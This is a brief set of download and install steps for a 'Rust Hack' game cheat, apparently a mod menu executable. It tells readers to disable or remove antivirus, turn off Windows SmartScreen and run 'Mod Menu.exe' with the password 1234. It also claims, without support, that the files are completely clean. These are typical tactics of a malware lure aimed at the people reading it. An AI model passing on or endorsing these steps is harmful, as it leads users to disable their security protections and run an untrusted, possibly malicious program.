If you can’t download / install the Rust Hack, you need to: 

1. disable / remove antivirus (files are completely clean) 

2. Open Mod Menu.exe, use password 1234

3. if you can’t download, try to copy the link and download using another browser! 

4. disable Windows Smart Screen, as well as update the Visual C++ package
